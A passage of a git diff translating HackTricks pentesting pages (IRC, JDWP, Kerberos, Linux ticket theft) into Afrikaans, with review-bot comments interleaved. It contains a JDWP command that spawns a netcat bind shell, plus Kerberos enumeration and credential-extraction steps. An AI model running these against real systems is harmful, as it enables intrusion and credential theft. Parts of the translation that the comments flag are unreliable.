wagwoord te gebruik of deur te soek na bekende swak wagwoorde. +- **Bruteforcing**: Voer 'n bruteforce-aanval uit om die wagwoorde van gebruikers te agterhaal. Maak gebruik van gereedskap soos Hydra of Medusa om verskillende kombinasies van gebruikersname en wagwoorde te probeer. 
+- **Kwesbaarheidsskandeerders**: Gebruik 'n kwesbaarheidsskandeerder soos Nessus of OpenVAS om te soek na bekende kwesbaarhede in die IRC-diens. + +Deur die identifisering en skandering van IRC-dienste kan jy moontlike kwesbaarhede opspoor en uitbuit om toegang tot die stelsel te verkry. Dit is belangrik om hierdie stappe te volg as deel van jou pentesting-proses. ```bash nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#irc) ### Shodan -* `looking up your hostname` +* `opsoek na jou gasheernaam`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
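Review bot: the text from "+IRC (Internet Relay Chat) is 'n kommunikasieprotokol ..." through "+Deur die identifisering en skandering van IRC-dienste ..." (the whole "#### 1. Identifiseer IRC-dienste" / "#### 2. Skandeer IRC-dienste" block) has no counterpart in the removed English lines, where "-### **Find and scan IRC services**" is followed directly by the nmap command; a translation commit must not add new content, and this block is generic filler containing at least one meaningless term ("Niksheid" for what was presumably a null/anonymous session). Remove it so the heading is again followed by the nmap block. Under "### Shodan", "+* `opsoek na jou gasheernaam`" translates "-* `looking up your hostname`", which is a literal server banner string used as the Shodan search term; it has to stay in English or the search no longer matches the banner. Lastly, the footer in this hunk is translated differently from the header in the previous hunk of the same file ("HackTricks-uitrusting" vs "HackTricks swag", "github-opslagplekke" vs "github-repos"); this boilerplate should be translated once and reused verbatim in every file.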
diff --git a/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md index 0e78c9238..a578ef21e 100644 --- a/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md @@ -2,63 +2,61 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Exploiting +## Uitbuiting -JDWP exploitation hinges on the **protocol's lack of authentication and encryption**. It's generally found on **port 8000**, but other ports are possible. The initial connection is made by sending a "JDWP-Handshake" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network. +JDWP-uitbuiting draai om die **gebrek aan outentisering en versleuteling van die protokol**. Dit word gewoonlik op **poort 8000** gevind, maar ander poorte is moontlik. Die aanvanklike verbinding word gemaak deur 'n "JDWP-Handshake" na die teikenpoort te stuur. As 'n JDWP-diens aktief is, reageer dit met dieselfde string om sy teenwoordigheid te bevestig. Hierdie handskommethode dien as 'n vingerafdrukmetode om JDWP-diens op die netwerk te identifiseer. -In terms of process identification, searching for the string "jdwk" in Java processes can indicate an active JDWP session. - -The go-to tool is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). You can use it with different parameters: +Wat prosesidentifikasie betref, kan die soektog na die string "jdwk" in Java-prosesse dui op 'n aktiewe JDWP-sessie. +Die go-to-hulpmiddel is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Jy kan dit met verskillende parameters gebruik: ```bash ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept ``` +Ek het gevind dat die gebruik van `--break-on 'java.lang.String.indexOf'` die uitbuiting meer **stabiel** maak. 
En as jy die kans het om 'n agterdeur na die gasheer te oplaai en dit uit te voer in plaas van 'n bevel uit te voer, sal die uitbuiting selfs meer stabiel wees. -I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable. +## Meer besonderhede -## More details - -**This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details. +**Dit is 'n opsomming van [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Kyk daar vir verdere besonderhede. -1. **JDWP Overview**: - - It's a packet-based network binary protocol, primarily synchronous. - - Lacks authentication and encryption, making it vulnerable when exposed to hostile networks. +1. **JDWP Oorsig**: +- Dit is 'n pakkie-gebaseerde netwerk binêre protokol, hoofsaaklik sinchronies. +- Dit het nie outentisering en enkripsie nie, wat dit kwesbaar maak wanneer dit blootgestel word aan vyandige netwerke. -2. **JDWP Handshake**: - - A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server). +2. **JDWP Handskud**: +- 'n Eenvoudige handskudproses word gebruik om kommunikasie te inisieer. 'n 14-karakter ASCII-string "JDWP-Handskud" word uitgewissel tussen die Debuut (kliënt) en die Debuugee (bediener). -3. **JDWP Communication**: - - Messages have a simple structure with fields like Length, Id, Flag, and CommandSet. - - CommandSet values range from 0x40 to 0x80, representing different actions and events. +3. **JDWP Kommunikasie**: +- Boodskappe het 'n eenvoudige struktuur met velde soos Lengte, Id, Vlag en CommandSet. 
+- CommandSet-waardes wissel van 0x40 tot 0x80 en verteenwoordig verskillende aksies en gebeure. -4. **Exploitation**: - - JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks. - - The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods. +4. **Uitbuiting**: +- JDWP maak dit moontlik om willekeurige klasse en bytekode te laai en aan te roep, wat sekuriteitsrisiko's inhou. +- Die artikel beskryf 'n uitbuitingsproses in vyf stappe, wat die ophaling van Java Runtime-verwysings, die stel van breekpunte en die aanroeping van metodes behels. -5. **Real-Life Exploitation**: - - Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub. - - The exploit script was tested against various JDK versions and is platform-independent, offering reliable Remote Code Execution (RCE). +5. **Uitbuiting in die werklike lewe**: +- Ten spyte van potensiële firewall-beskerming is JDWP-dienste ontdekbaar en uitbuitbaar in werklike scenario's, soos gedemonstreer deur soektogte op platforms soos ShodanHQ en GitHub. +- Die uitbuitingsskrips is getoets teen verskillende JDK-weergawes en is platform-onafhanklik, en bied betroubare afstandsbeheeruitvoering (RCE). -6. **Security Implications**: - - The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations. +6. **Sekuriteitsimplikasies**: +- Die teenwoordigheid van oop JDWP-dienste op die internet beklemtoon die noodsaaklikheid van gereelde sekuriteitsondersoeke, die deaktivering van foutopsporingsfunksies in produksie en behoorlike firewall-konfigurasies. 
-### **References:** +### **Verwysings:** * [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)] * [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier) @@ -75,14 +73,14 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
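Review bot: item 2 of "## Meer besonderhede" translates a protocol literal: "+- 'n Eenvoudige handskudproses ... 'n 14-karakter ASCII-string "JDWP-Handskud" word uitgewissel ...". The string exchanged on the wire is exactly "JDWP-Handshake" (which is the 14-character string the sentence refers to), and the "## Uitbuiting" paragraph earlier in the same hunk correctly keeps it untranslated, so the quoted literal must be restored. In the same line "Debuut (kliënt)" and "Debuugee (bediener)" are not renderings of Debugger/Debuggee ("debuut" means debut); keep "Debugger (kliënt) en die Debuggee (bediener)". Further wording problems in the hunk: "handskommethode" is garbled (should be "handskudmetode"), "uitbuitingsskrips" is a typo, and "afstandsbeheeruitvoering (RCE)" turns Remote Code Execution into remote control; RCE means executing code remotely, so translate it as such or leave the English term beside the abbreviation. Finally, the sub-bullets under the numbered list lost their indentation ("-   - It's a packet-based network binary protocol ..." became "+- Dit is 'n pakkie-gebaseerde ..."), which breaks the nesting when rendered; restore the leading spaces.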
diff --git a/network-services-pentesting/pentesting-kerberos-88/README.md b/network-services-pentesting/pentesting-kerberos-88/README.md index 3c44604cd..e1090bbc9 100644 --- a/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/network-services-pentesting/pentesting-kerberos-88/README.md @@ -2,36 +2,34 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Kerberos** operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. +**Kerberos** werk op 'n beginsel waar dit gebruikers outentiseer sonder om hul toegang tot hulpbronne direk te bestuur. Dit is 'n belangrike onderskeid omdat dit die rol van die protokol in sekuriteitsraamwerke beklemtoon. -In environments like **Active Directory**, **Kerberos** is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, **Kerberos** does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. +In omgewings soos **Active Directory** is **Kerberos** instrumenteel om die identiteit van gebruikers te bevestig deur hul geheime wagwoorde te valideer. Hierdie proses verseker dat elke gebruiker se identiteit bevestig word voordat hulle met netwerkbronne interaksie het. **Kerberos** brei egter nie sy funksionaliteit uit om die regte wat 'n gebruiker oor spesifieke hulpbronne of dienste het te evalueer of af te dwing nie. In plaas daarvan bied dit 'n veilige manier om gebruikers te outentiseer, wat 'n kritieke eerste stap in die sekuriteitsproses is. -After authentication by **Kerberos**, the decision-making process regarding access to resources is delegated to individual services within the network. These services are then responsible for evaluating the authenticated user's rights and permissions, based on the information provided by **Kerberos** about the user's privileges. 
This design allows for a separation of concerns between authenticating the identity of users and managing their access rights, enabling a more flexible and secure approach to resource management in distributed networks. - -**Default Port:** 88/tcp/udp +Na outentisering deur **Kerberos** word die besluitnemingsproses oor toegang tot hulpbronne gedelegeer na individuele dienste binne die netwerk. Hierdie dienste is dan verantwoordelik vir die evaluering van die regte en toestemmings van die geoutentiseerde gebruiker, gebaseer op die inligting wat **Kerberos** verskaf oor die gebruiker se voorregte. Hierdie ontwerp maak dit moontlik om 'n skeiding van verantwoordelikhede te hê tussen die outentisering van die identiteit van gebruikers en die bestuur van hul toegangsregte, wat 'n meer buigsame en veilige benadering tot hulpbronbestuur in verspreide netwerke moontlik maak. +**Verstekpoort:** 88/tcp/udp ``` PORT STATE SERVICE 88/tcp open kerberos-sec ``` +### **Om te leer hoe om Kerberos te misbruik, moet jy die pos oor** [**Active Directory**](../../windows-hardening/active-directory-methodology/)** lees.** -### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/)**.** - -## More +## Meer ### Shodan 
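Review bot: the blank lines around the code fence and the following heading are dropped in this hunk: "+**Verstekpoort:** 88/tcp/udp ```" puts the fence on the line right after the paragraph, and "+### **Om te leer hoe om Kerberos te misbruik ..." now sits directly after the closing fence, whereas the removed lines had a blank line in each place. Since only the prose needs translating, please preserve the original whitespace so the rendered layout stays identical to the English page. The same applies to "+## Meer", which replaced "-## More" together with its surrounding blank line.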
@@ -39,54 +37,52 @@ PORT STATE SERVICE ### MS14-068 -The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest. +Die MS14-068 fout stel 'n aanvaller in staat om 'n legitieme gebruiker se Kerberos aanmeldings-token te manipuleer om valse verhewe regte te eis, soos om 'n Domein Admin te wees. Hierdie valse eis word per abuis deur die Domeinbeheerder gevalideer, wat ongemagtigde toegang tot netwerkbronne regoor die Active Directory-bos moontlik maak. {% embed url="https://adsecurity.org/?p=541" %} -Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) - -## HackTricks Automatic Commands +Ander exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Kerberos #Protocol Abbreviation if there is one. Port_Number: 88 #Comma separated if there is more than one. Protocol_Description: AD Domain Authentication #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for Kerberos - Note: | - Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. - In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. 
However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. +Name: Notes +Description: Notes for Kerberos +Note: | +Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. +In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. 
- https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88 +https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88 Entry_2: - Name: Pre-Creds - Description: Brute Force to get Usernames - Command: nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} {IP} +Name: Pre-Creds +Description: Brute Force to get Usernames +Command: nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} {IP} Entry_3: - Name: With Usernames - Description: Brute Force with Usernames and Passwords - Note: consider git clonehttps://github.com/ropnop/kerbrute.git ./kerbrute -h +Name: With Usernames +Description: Brute Force with Usernames and Passwords +Note: consider git clonehttps://github.com/ropnop/kerbrute.git ./kerbrute -h Entry_4: - Name: With Creds - Description: Attempt to get a list of user service principal names - Command: GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs +Name: With Creds +Description: Attempt to get a list of user service principal names +Command: GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
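Review bot: the "## HackTricks Outomatiese Opdragte" fenced block has had its indentation removed even though nothing inside the fence needed translating: "-  Name: Notes" became "+Name: Notes", "-  Note: |" became "+Note: |", and every "Description:"/"Command:" line likewise lost its two leading spaces. That block is a YAML-style structure in which Name/Description/Command nest under "Entry_1:" ... "Entry_4:" and the "|" literal block relies on the indentation of the lines that follow it; flattening them changes the structure and breaks the literal block, so these lines should be reverted to the originals byte for byte. While in this block, the pre-existing "Note: consider git clonehttps://github.com/ropnop/kerbrute.git" is missing a space after "clone", but that is a separate fix and should not be mixed into a translation commit. The blank line before the fence ("+## HackTricks Outomatiese Opdragte ```") was also removed; keep it.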
diff --git a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index 9fc73f1f0..31727465e 100644 --- a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -1,48 +1,44 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### Credential Storage in Linux -Linux systems store credentials in three types of caches, namely **Files** (in `/tmp` directory), **Kernel Keyrings** (a special segment in the Linux kernel), and **Process Memory** (for single-process use). The **default\_ccache\_name** variable in `/etc/krb5.conf` reveals the storage type in use, defaulting to `FILE:/tmp/krb5cc_%{uid}` if not specified. +### Kredensiaalopberging in Linux +Linux-stelsels stoor kredensiale in drie tipes kasgeheues, naamlik **Lêers** (in die `/tmp`-gids), **Kernel Keyrings** ( 'n spesiale segment in die Linux-kernel) en **Prosesgeheue** (vir enkelprosesgebruik). Die **default\_ccache\_name** veranderlike in `/etc/krb5.conf` onthul die tipe opberging wat gebruik word, wat standaard na `FILE:/tmp/krb5cc_%{uid}` verwys as dit nie gespesifiseer is nie. -### Extracting Credentials -The 2017 paper, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys. +### Onttrekking van Kredensiale +Die 2017-artikel, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), beskryf metodes vir die onttrekking van kredensiale uit sleutelringe en prosesse, met die klem op die Linux-kernel se sleutelringmeganisme vir die bestuur en berging van sleutels. -#### Keyring Extraction Overview -The **keyctl system call**, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The **hercules.sh script** from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft. 
+#### Oorsig van Sleutelringonttrekking +Die **keyctl-stelseloproep**, wat in kernelweergawe 2.6.10 ingevoer is, maak dit vir toepassings in gebruikersruimte moontlik om met kernel-sleutelringe te kommunikeer. Kredensiale in sleutelringe word as komponente gestoor (verstekprinsipaal en kredensiale), wat verskil van lêer-ccaches wat ook 'n kop bevat. Die **hercules.sh-skripsie** uit die artikel demonstreer die onttrekking en herkonstruksie van hierdie komponente in 'n bruikbare lêer-ccache vir kredensiaaldiefstal. -#### Ticket Extraction Tool: Tickey -Building on the principles of the **hercules.sh script**, the [**tickey**](https://github.com/TarlogicSecurity/tickey) tool is specifically designed for extracting tickets from keyrings, executed via `/tmp/tickey -i`. +#### Hulpmiddel vir Onttrekking van Kaartjies: Tickey +Met die beginsels van die **hercules.sh-skripsie** as basis, is die [**tickey**](https://github.com/TarlogicSecurity/tickey) hulpmiddel spesifiek ontwerp vir die onttrekking van kaartjies uit sleutelringe, uitgevoer deur middel van `/tmp/tickey -i`. -## References +## Verwysings * [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
